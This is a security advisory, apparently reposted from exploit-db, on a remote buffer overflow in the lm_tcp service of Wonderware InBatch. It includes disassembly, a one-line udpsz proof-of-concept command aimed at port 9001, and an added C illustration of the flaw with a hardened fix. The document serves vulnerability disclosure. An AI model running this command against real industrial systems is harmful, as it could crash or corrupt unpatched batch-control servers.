WonderWare InBatch 9.0sp1 – Buffer Overflow

  • Author: Luigi Auriemma
    Date: 2010-12-08
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15707/
  • Source: http://aluigi.org/adv/inbatch_1-adv.txt
    
    #######################################################################
    
     Luigi Auriemma
    
    Application:  Wonderware InBatch
                  http://global.wonderware.com/EN/Pages/WonderwareInBatchSoftware.aspx
                  any other software that uses the lm_tcp server (called
                  "Raima Database lockmgr") like Foxboro I/A Batch
    Versions:     lm_tcp <= 9.0.0 0248.18.0.0 (InBatch <= 9.0sp1)
    Platforms:    Windows, Linux
    Bug:          buffer-overflow
    Exploitation: remote, versus server
    Date:         07 Dec 2010
    Author:       Luigi Auriemma
    e-mail:       aluigi@autistici.org
    web:          aluigi.org
    
    
    #######################################################################
    
    
    1) Introduction
    2) Bug
    3) The Code
    4) Fix
    
    
    #######################################################################
    
    ===============
    1) Introduction
    ===============
    
    
    InBatch is software for the industrial automation sector used to create
    batch processes.
    
    
    #######################################################################
    
    ======
    2) Bug
    ======
    
    
    The lm_tcp service listens (started manually or automatically when the
    "Environment Display/Manager" is launched) on port 9001 and is
    vulnerable to a buffer overflow while copying a string into a 150-byte
    buffer that is part of a fixed structure.
    
    The overflow (at most 19204 characters) only allows overwriting the two
    memory pointers located after the space reserved for the copied string;
    these pointers are immediately used in two memset(buffer, 0, 2)
    operations, with the effect of writing a 16-bit 0x0000 to an arbitrary
    memory location:
    
    00403E40 |> 8A01             /MOV AL,BYTE PTR DS:[ECX]          ; strcpy
    00403E42 |. 8802             |MOV BYTE PTR DS:[EDX],AL
    00403E44 |. 83C1 01          |ADD ECX,1
    00403E47 |. 83C2 01          |ADD EDX,1
    00403E4A |. 84C0             |TEST AL,AL
    00403E4C |.^75 F2            \JNZ SHORT lm_tcp.00403E40
    00403E4E |. 8B4424 24        MOV EAX,DWORD PTR SS:[ESP+24]
    00403E52 |. 66:8B48 12       MOV CX,WORD PTR DS:[EAX+12]
    00403E56 |. 8B15 48A84000    MOV EDX,DWORD PTR DS:[40A848]
    00403E5C |. 66:83E9 78       SUB CX,78
    00403E60 |. 66:F7D9          NEG CX
    00403E63 |. 1BC9             SBB ECX,ECX
    00403E65 |. 83E1 0E          AND ECX,0E
    00403E68 |. 83C1 58          ADD ECX,58
    00403E6B |. 898C16 98000000  MOV DWORD PTR DS:[ESI+EDX+98],ECX
    00403E72 |. A1 78A84000      MOV EAX,DWORD PTR DS:[40A878]
    00403E77 |. 8B0D 48A84000    MOV ECX,DWORD PTR DS:[40A848]
    00403E7D |. 8B940E 9C000000  MOV EDX,DWORD PTR DS:[ESI+ECX+9C]  ; first pointer overwritten
    00403E84 |. 50               PUSH EAX
    00403E85 |. 52               PUSH EDX
    00403E86 |. E8 050C0000      CALL lm_tcp.00404A90               ; memset
    00403E8B |. A1 78A84000      MOV EAX,DWORD PTR DS:[40A878]
    00403E90 |. 8B0D 48A84000    MOV ECX,DWORD PTR DS:[40A848]
    00403E96 |. 8B940E A0000000  MOV EDX,DWORD PTR DS:[ESI+ECX+A0]  ; second pointer overwritten
    00403E9D |. 50               PUSH EAX
    00403E9E |. 52               PUSH EDX
    00403E9F |. E8 EC0B0000      CALL lm_tcp.00404A90               ; memset
    
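The C below is an added illustration, not code from the advisory or from lm_tcp itself: it reconstructs the defect class the disassembly shows (an unbounded strcpy loop into a 150-byte field of a fixed structure, with the two pointers later handed to memset sitting right behind it) next to a bounds-checked replacement that fails closed. The structure name, field names and field order are assumptions made for the example; the real lm_tcp layout is not published, and the advisory only states the buffer size and that the two pointers follow it.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* ASSUMED layout: the advisory only says the 150-byte destination sits in a
 * fixed structure and that the two pointers used by memset(p, 0, 2) follow it.
 * Field names and their exact order are this example's invention. */
#define LM_NAME_LEN 150

struct lm_record {
    char  name[LM_NAME_LEN];  /* destination of the unbounded copy */
    void *clear_a;            /* first pointer, later passed to memset(clear_a, 0, 2) */
    void *clear_b;            /* second pointer, same use */
};

/* The pattern the disassembly shows (an inlined strcpy loop): no length check,
 * so input longer than 149 bytes runs past name[] into the two pointers.
 * Kept only for comparison; never call it with untrusted input. */
void lm_store_name_vulnerable(struct lm_record *rec, const char *src)
{
    strcpy(rec->name, src);
}

/* Hardened replacement: reject anything that does not fit together with its
 * terminating NUL instead of truncating and silently changing the value.
 * Returns 0 on success, -1 when the input is rejected. */
int lm_store_name_checked(struct lm_record *rec, const char *src, size_t src_len)
{
    if (rec == NULL || src == NULL)
        return -1;
    if (src_len >= LM_NAME_LEN)              /* 149 bytes + NUL is the limit */
        return -1;
    if (memchr(src, '\0', src_len) != NULL)  /* embedded NUL: malformed input */
        return -1;
    memcpy(rec->name, src, src_len);
    rec->name[src_len] = '\0';
    return 0;
}

/* Bytes an unchecked copy of an n-character string (plus NUL) writes past name[]. */
size_t lm_overflow_bytes(size_t n)
{
    return (n + 1 > LM_NAME_LEN) ? (n + 1 - LM_NAME_LEN) : 0;
}

/* Offsets of the two pointers from the start of the structure: the first one
 * begins right after name[] (plus alignment padding), so an overrun of a few
 * bytes already controls what the later memset() zeroes. */
size_t lm_offset_clear_a(void) { return offsetof(struct lm_record, clear_a); }
size_t lm_offset_clear_b(void) { return offsetof(struct lm_record, clear_b); }

/* Self-check: exercises only the hardened path and returns 1 on success.
 * Inputs are constructed here: a short legitimate name and a 200-byte filler. */
int lm_self_check(void)
{
    struct lm_record rec;
    char filler[200];

    memset(&rec, 0, sizeof rec);
    memset(filler, 'A', sizeof filler);

    if (lm_store_name_checked(&rec, "unit-01", 7) != 0) return 0;
    if (strcmp(rec.name, "unit-01") != 0) return 0;
    /* oversized input is rejected and the pointers stay untouched */
    if (lm_store_name_checked(&rec, filler, sizeof filler) != -1) return 0;
    if (rec.clear_a != NULL || rec.clear_b != NULL) return 0;
    /* exactly 149 bytes still fits, 150 does not */
    if (lm_store_name_checked(&rec, filler, LM_NAME_LEN - 1) != 0) return 0;
    if (lm_store_name_checked(&rec, filler, LM_NAME_LEN) != -1) return 0;
    return 1;
}

int main(void)
{
    printf("first pointer at offset %zu, second at %zu\n",
           lm_offset_clear_a(), lm_offset_clear_b());
    printf("a 160-byte string overruns name[] by %zu bytes\n", lm_overflow_bytes(160));
    printf("hardened path self-check: %s\n", lm_self_check() ? "ok" : "FAILED");
    return lm_self_check() ? 0 : 1;
}
```

The checked variant takes an explicit length rather than trusting a NUL terminator from the wire, which is the property the original code lacks: the inlined strcpy loop at 00403E40 stops only when it meets a zero byte in the attacker-supplied data, and nothing before it compares that length against the 150 bytes available.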
    
    #######################################################################
    
    ===========
    3) The Code
    ===========
    
    
    http://aluigi.org/testz/udpsz.zip
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15707.zip (udpsz.zip)
    
    udpsz -C "00004b14 00000000 00000001 00000000 0001 0000" -b 0x61 -T SERVER 9001 0x4b18
    
    
    #######################################################################
    
    ======
    4) Fix
    ======
    
    
    No fix.
    
    
    #######################################################################